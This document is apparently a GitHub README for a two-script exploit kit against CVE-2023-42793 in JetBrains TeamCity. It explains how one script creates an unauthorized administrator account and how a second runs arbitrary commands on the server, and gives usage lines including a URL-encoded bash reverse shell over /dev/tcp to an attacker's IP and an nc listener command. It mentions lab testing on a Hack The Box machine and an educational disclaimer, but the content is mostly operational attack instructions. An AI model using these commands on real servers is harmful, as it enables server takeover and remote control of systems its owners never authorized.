use
exploit.py
first to creat administrator account for you and then userce.py
to execute commands on the target, and for reverse shell check this
This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL
: Target URL (required)-v, --verbose
: Enable verbose mode-n, --username USERNAME
: Specify username (default: random)-p, --password PASSWORD
: Specify password (default: random)-e, --email EMAIL
: Specify email (default: random)-t, --token-file
: File to save the token
- Python 3.x
- Python libraries
- To install the dependencies
pip3 install -r requirements.txt
- To install the dependencies
-
Exploit with random username, password, and email:
python exploit.py -u http://target.com
-
Exploit with specified username, password, and email:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
Upon successful exploitation, the script prints the URL, username, and password of the created admin account then save the output in token file.
Description This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL
: Target URL (required)-t, --token-file
: TO specify the file containing the token-c, --command COMMAND
: Specify command to execute (RCE)-P, --port PORT
: Specify port (default is 80)
Exploit with a specified command:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
- In this command for reverse shell replace {IP} with your ip and {port} with the port you are listening on
- Creat a listener using nc for ex
nc -nvlp 5555
- For more check revshells
- This script has been tested on Runner.htb from hack the box
- This script is for educational purposes only.
- Use it responsibly and only on systems you are authorized to test.
- Zyad Elsayed
- GitHub Repository: Zyad-Elsayed
- LinkedIn account: zyad-abdelbary
- Original Exploit for admin account: ByteHunter (Exploit-DB)
- CVE-2023-42793 Description: Official description of the CVE vulnerability.
- Exploit Database Entry: Original exploit code on Exploit Database.
- TeamCity Blog: Blog post discussing the CVE-2023-42793 vulnerability in TeamCity.
- TeamCity Documentation: Official documentation for TeamCity.